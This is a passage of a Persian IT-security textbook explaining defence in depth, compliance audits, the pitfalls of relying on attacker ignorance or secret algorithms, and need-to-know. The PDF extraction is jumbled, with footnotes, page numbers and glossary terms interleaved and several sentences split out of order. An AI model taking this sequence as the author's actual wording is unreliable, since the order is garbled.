ﻧﻤﺎﺋﻴﺪ .ﺳﭙﺲ ﻧﻈﺎﺭﺕ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺁﻥ ﻣﺠﻤﻮﻋﻪ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ
ﺗﺎ ﻣﻄﺌﻤﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺗﺨﺎﺫﺷﺪﻩ ،ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ
ﻭﺍﻗﻌﹰﺎ ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ .ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳﺰ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﺗﻨﻬـﺎ ﻳـﻚ
ﻼ ﺳـﻪ
ﻣﺠﻤﻮﻋﺔ ﺩﻓﺎﻋﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳـﺰﺵ ﺍﺯ ﻣـﺜ ﹰ
٨٢
ﻣﺮﺣﻠﺔ ﺩﻓﺎﻋﻲ ﺑﻌﻼﻭﺓ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺧﻄﺎﺭ ﻣﻲﺑﺎﺷﺪ.
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
ﺿﻤﺎﻧﺖ ﺍﺟﺮﺍﻳﻲ ،ﻭ ﺑﺎﺯﺑﻴﻨﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
•
ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﺮﺗﺒﹰﺎ ﺑﺮﺭﺳﻲ
ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺳﻴﺎﺳﺖ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ
ﻳﺎ ﻧﻪ ،ﻭ ﺍﮔﺮ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ ﺁﻳﺎ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺳـﺖ ﻳـﺎ ﺧﻴـﺮ.
ﻭﺍﮊﺓ ﻣﻤﻴﺰﻱ ٨٣ﺑﺎﺭ ﻣﻌﻨﺎﻳﻲ ﺟﺪﻳﺪﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ
ﺣﺪﺍﻗﻞ ﺩﺭ ﻣﻌﺎﻧﻲ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ،ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴﺮﻱ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒـﺖ( ،ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺳﻴـﺴﺘﻢ ،ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ﺭﻋﺎﻳـﺖ
۸۲
ﻳﻚ ﻣﻤﻴﺰ ﹺ
ﻱ ﺭﻋﺎﻳﺖ ﺳﻴﺎﺳﺖ ٨٤ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺗﺎ ﻣﺸﺨﺺ ﮔﺮﺩﺩ ﺁﻳﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺫﻛﺮﺷـﺪﻩ ﺩﺭ
ﺳﻴﺎﺳﺖ ﺭﻋﺎﻳﺖ ﻣﻲﺷﻮﻧﺪ ﻳـﺎ ﻧـﻪ ،ﻭ ﺍﮔـﺮ ﻧﻤـﻲﺷـﻮﻧﺪ ﺩﻟﻴـﻞ ﺁﻥ
ﻻ ﻣﻌﻴﺎﺭﻫــﺎ ﻭ ﺭﻭﺷــﻬﺎﻳﻲ ﺑــﺮﺍﻱ
ﭼﻴــﺴﺖ .ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻌﻤــﻮ ﹰ
ﺳﻨﺠﻴﺪﻩﺷﺪﻥ ﺧﻮﺩ ﻧﻴﺰ ﺑﺪﺳﺖ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻚ
ﻣﻤﻴﺰ ﺑﺮﺍﻱ ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﺭﻋﺎﻳﺖﺷـﺪﻥ ﻳـﺎ ﻧـﺸﺪﻥ ﺁﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﮔﺮ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﻋﺎﻳﺖ ﻧـﺸﺪﻩ ﺑﺎﺷـﻨﺪ،
ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﺔ ﻫﺮ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ:
•
ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ،ﻧﻮﺷﺘﺔ :Tom Kellermann
"The 12 Layer Matrix: Building a CyberFortress (2003)":
http://wbln0018.worldbank.org/html/FinancialS
ectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Tools
Audit
ﺳﻴﺎﺳﺖ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
83
•
ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭﻛﻨﺎﻥ؛
ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻭ ﻓﻘﺪﺍﻥ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻻﺯﻡ؛
ﻛﺎﺭ ﺯﻳﺎﺩ؛
ﻧﻘﺺ ﺍﻣﻜﺎﻧﺎﺕ؛
ﻧﺪﺍﺷﺘﻦ ﺍﻧﮕﻴﺰﺓ ﻻﺯﻡ؛
ﻛﻤﺒﻮﺩ ﻭﺳﺎﻳﻞ ﻛﺎﻓﻲ؛
ﻣﻨﺎﺑﻊ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﻧﺎﻣﻨﺎﺳﺐ؛
ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺎﻛﺎﻓﻲ؛
ﻛﺎﺭﺑﺮﺩ ﻳﺎ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ؛
ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ؛
ﺑﻲﻣﺴﺌﻮﻟﻴﺘﻲ؛
ﺗﺪﺍﺧﻞ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛
ﺗﻘﺴﻴﻢ ﻛﺎﺭ ﻧﺎﻣﺸﺨﺺ ،ﻧﺎﻫﻤﺎﻫﻨﮓ ﻭ ﮔﻴﺞﻛﻨﻨﺪﻩ؛
ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﻴﺎﺳﺖ؛
ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﺶﺑﻴﻨﻲ ﻧﺸﺪﻩ؛
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻧﺎﻗﺺ ﻳﺎ ﺍﺯ ﻗﻠﻢ ﺍﻓﺘﺎﺩﻩ؛
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺘﺪﺍﺧﻞ؛ ﻭ
ﻧﺎﺳﺎﺯﮔﺎﺭﻱ ﺳﻴﺎﺳﺖ ﻭ ﻣﺤﻴﻂ.
ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻓﻬﺮﺳﺖ ﺑﺎﻻ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺳﻴﺎﺳـﺖ
ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺩﺍﻧﺴﺖ .ﺣﺘـﻲ
ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﺍﺿـﺎﻓﻪﻛـﺎﺭ ﺑـﻴﺶ ﺍﺯ ﺣـﺪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﻱ ﺭﻋﺎﻳﺖ ﻧﺒﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ
ﺭﺍﻫﺒﺮﺍﻥ ﻧﻴﺴﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻳﻚ ﻣﻤﻴﺰ ﹺ
ﻓﺮﺁﻳﻨﺪ ﻧﺎﻣﻄﻠﻮﺏ ﺩﻳﺪﻩ ﺷﻮﺩ؛ ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺁﻥ ﺑـﺼﻮﺭﺕ ﻳـﻚ
ﺗﻼﺵ ﻫﻤﮕﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ ،ﻳﺎﻓﺘﻦ ﻭ ﺗﺨـﺼﻴﺺ
ﻣﺠﺪﺩ ﻣﻨﺎﺑﻊ ،ﭘﺎﻻﻳﺶ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﻭ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ
ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﮕﺮﻳـﺴﺖ .ﻣـﺸﺎﺑﻪ ﻫﻤـﺔ ﻗـﺴﻤﺘﻬﺎﻱ
Compliance Audit Policy
84
١٥٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ،ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺭﻭﻳﻜﺮﺩ ﮔﺮﻭﻫﻲ ﺩﺭ ﺍﻛﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ
ﺷﺮﺍﻳﻂ ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﻭﻳﻜـﺮﺩ ﺍﺳـﺖ .ﺍﮔـﺮ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ
ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ ،ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻮﺏ ﺩﺳـﺖ
ﻳﺎﺑﻨﺪ .ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫﺎﻳـﺸﺎﻥ
ﻛﻤــﻚ ﻛﻨــﻴﻢ ،ﻧــﻪ ﺍﻳﻨﻜــﻪ ﺧــﻮﺩ ﺭﺍ ﺩﺭ ﻃــﺮﻑ ﺩﻳﮕــﺮ ﻣﻴــﺰ ﻭ ﺩﺭ
ﻣﻘﺎﺑﻠﺸﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﻢ.
ﺍﺷﻜﻼﺕ ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬﻞ ﻣﻬﺎﺟﻢ
ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻔﻬـﻮﻡ "ﻧﻴـﺎﺯ ﺑـﻪ
ﻻ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻮﻳﮋﻩ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ
ﺩﺍﻧﺴﺘﻦ" ﻣﻌﻤﻮ ﹰ
ﺻﺪﻕ ﻣﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺑـﺮ ﺍﻳـﻦ ﻣﺒﻨـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ
ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺎﺩﺍﻧﺴﺘﻪ ﺑﺎﺷﺪ .ﺍﺗﻜـﺎ
ﺑﻪ ﺟﻬﻞ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻤﻨﻲ ﺷﻤﺎ ﺧﺪﺷﻪ ﻭﺍﺭﺩ ﻛﻨﺪ.
ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺷﻜﺎﻻﺕ ﻳﺎ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﺣﻔﺎﻇـﺖ
ﺩﺭ ﻣﻘﺎﺑــﻞ ﺁﻧﻬــﺎ ﻧﻴــﺰ ﻳــﻚ ﺭﻭﻳﻜــﺮﺩ ﺿــﻌﻴﻒ ﺍﻣﻨﻴﺘــﻲ ﺍﺳــﺖ.
ﻻ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﺏ ﻣﺨﻔﻲ ﻗﺮﺍﺭ
ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻌﻤﻮ ﹰ
ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﺑـﺪﻭﻥ ﺍﺭﺍﺋـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ،
ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻧﺪ .ﮔﺎﻫﻲ ﻧﻴﺰ ﺍﺷﻜﺎﻻﺕ ﺳﻴـﺴﺘﻢ
ﺑﺎ ﻋﻮﺍﺭﺽ ﻋﻤﻴﻖ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ ،ﭼﺮﺍﻛﻪ ﻣـﺪﻳﺮ
ﺗﺼﻮﺭ ﻣﻲﻛﻨﺪ ﻛﺴﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﻧﺪﺍﺭﺩ .ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ
ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺸﻜﻼﺕ ﻭ
ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻳﺎ ﺑﻮﺳﻴﻠﺔ ﻳـﻚ
ﻧﻔﻮﺫﮔﺮ ﻣﺼﻤﻢ ﻛﺸﻒ ﺷـﻮﻧﺪ .ﻣﺨﻔـﻲ ﻧﮕﻬﺪﺍﺷـﺘﻦ ﺍﺷـﻜﺎﻻﺕ ﻭ
ﻭﻳﮋﮔﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻣﻮﺭﺩ ﻣﺸﺎﻫﺪﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﻭ
ﻃﺒﻴﻌﺘﹰﺎ ﺍﺻﻼﺡﻧﺸﺪﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨـﺪ .ﻟـﺬﺍ ﭘـﺲ ﺍﺯ ﺁﻧﻜـﻪ ﻛـﺸﻒ
ﺷﺪﻧﺪ ،ﻭﺟﻮﺩ ﻣﺸﻜﻞ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺗﻤـﺎﻡ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ
ﻧــﺴﺒﺖ ﺑــﻪ ﺣﻤﻠــﺔ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﻣــﺸﻜﻞ ﺭﺍ ﻛــﺸﻒ ﻛــﺮﺩﻩﺍﻧــﺪ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ.
ﻣﺤﻴﻄﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺪﻳﺮﻳﺖ ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴـﺮﺩ
ﻛﺘﺎﺑﭽﻪ ﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﺭﺍ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﻭﺭ ﻧﮕـﻪ ﺩﺍﺭﺩ ﺗـﺎ
ﺍﺟﺎﺯﻩ ﻧﺪﻫﺪ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺍﻣﻴﻦ ﻭ ﮔﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ
ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺧﺪﺷـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩ ﻣﻄﻠﺒـﻲ ﺑﻴﺎﻣﻮﺯﻧـﺪ .ﺩﺭ
ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﻣﺪﻳﺮﺍﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﺑﺎﺷـﻨﺪ ﻛـﻪ
ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩﺍﻧﺪ ،ﺍﻣـﺎ ﺩﺭ ﻭﺍﻗـﻊ ﺍﻳﻨﻄـﻮﺭ
ﻧﻴﺴﺖ .ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺼﻤﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺭﺍ ﺟﺎﻱ ﺩﻳﮕﺮﻱ
ﭘﻴﺪﺍ ﻛﻨﺪ -ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺍﺩﺍﺭﺍﺕ ﺩﻳﮕﺮ .ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ
ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺩﺭ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻤﺘﺮ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻛﺘﺎﺑﻔﺮﻭﺷﻲ ﺑﻪ ﻫـﺮ
ﺍﺩﺍﺭﻩ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ! ﻣﺪﻳﺮﻳﺖ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﻫﻤﺔ ﺭﺍﻫﻬﺎﻱ ﻳﺎﺩﮔﻴﺮﻱ
ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺒﻨﺪﺩ .ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑـﻪ ﺍﻳـﻦ
ﺩﻟﻴﻞ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﻨﺎﺩ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻛﺎﺭﺁﺗﺮ
ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ﻳـﺎ
85
86
Inferential Security
ﻼ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ
ﺍﺭﺯﺵ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ -ﻣـﺜ ﹰ
ﺍﻧﺤﺼﺎﺭﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ -ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ .ﺗﺎ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ
ﻣﺘﺨﺼﺺ ﺭﻣﺰﻧﮕﺎﺭﻱ ٨٦ﻧﺒﺎﺷﻴﺪ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ ﻗـﺪﺭﺕ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺭﺍ
ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ .ﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ
ﻧﻘﺎﻳﺺ ﺟﺪﻱ ﺍﺳﺖ .ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲ ﺷـﻮﺩ
ﻃﺒﻴﻌﺘﹰﺎ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻧﻤـﻲﮔﻴـﺮﺩ ﻭ ﻟـﺬﺍ ﻫـﺮ
ﻛﺴﻲ ﻛﻪ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺁﻥ ﺑﻴﺎﺑﺪ ﺧﻮﺍﻫـﺪ ﺗﻮﺍﻧـﺴﺖ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ
ﺷﻤﺎ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺘﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ.
Cryptography
ﺑﺨﺶ ﺳﻮﻡ
ﻲ ﺍﻣﻨﻴﺖ ﻛﻪ ﻋﻤﺪﺗﹰﺎ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺍﻃﻼﻋـﺎﺕ
ﺩﺭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺳﻨﺘ ﹺ
ﺍﺭﺗﺶ ﻧﺸﺄﺕ ﻣﻲﮔﺮﻓﺖ ﻳﻚ ﻣﻔﻬﻮﻡ ﺑﺎ ﻋﻨﻮﺍﻥ "ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧـﺴﺘﻦ"
ﻭﺟﻮﺩ ﺩﺍﺷﺖ .ﺍﻃﻼﻋﺎﺕ ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﻣﻲﺷﺪ ﻭ ﺑﻪ ﻫﺮ ﻛﺲ ﺁﻧﻘﺪﺭ
ﺍﺯ ﺁﻥ ﺗﺨﺼﻴﺺ ﻣﻲﻳﺎﻓﺖ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﺁﻥ ﺑـﻪ ﻭﻇـﺎﻳﻔﺶ ﻋﻤـﻞ
ﻛﻨــﺪ .ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻳﻲ ﻛــﻪ ﻗــﺴﻤﺘﻬﺎﻱ ﺧﺎﺻــﻲ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ
ﺣﺴﺎﺳﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻳﺎ ﺍﻣﻨﻴﺖ ﺍﺳﺘﻨﺒﺎﻃﻲ ٨٥ﺑﺎﻳﺪ ﺑﺮﻗـﺮﺍﺭ ﺑﺎﺷـﺪ،
ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺍﺯ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﮔـﺮ ﺳـﻪ ﻗﻄﻌـﺔ
ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺘﻮﺍﻧﻨﺪ ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺨﺮﺏ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻭﺭﻧﺪ
ﻭﻟﻲ ﻫﻴﭽﻜﺲ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﻗﻄﻌﻪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺍﺳﺖ.
ﻣﻄﻠﺐ ﺑﻴﺎﻣﻮﺯﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑﻬـﺮﺓ ﺑـﺴﻴﺎﺭ ﻛﻤـﻲ
ﺑﺒﺮﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﮕﻴـﺰﺓ ﺍﻳـﺸﺎﻥ ﺗـﻀﻌﻴﻒ ﺷـﻮﺩ،
ﭼﺮﺍﻛﻪ ﭘﻴﺎﻡ ﺿﻤﻨﻲ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﻣﺎ ﺑﻪ
ﺷﻤﺎ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻣﻞ ﻧـﺪﺍﺭﻳﻢ ﻛـﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻣـﺴﺌﻮﻟﻴﺖﺷـﻨﺎﺱ
ﺑﺎﺷﻴﺪ" .ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺍﮔـﺮ ﻛـﺴﻲ ﺑـﻪ ﺳـﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﻭ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﭙﺮﺩﺍﺯﺩ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ
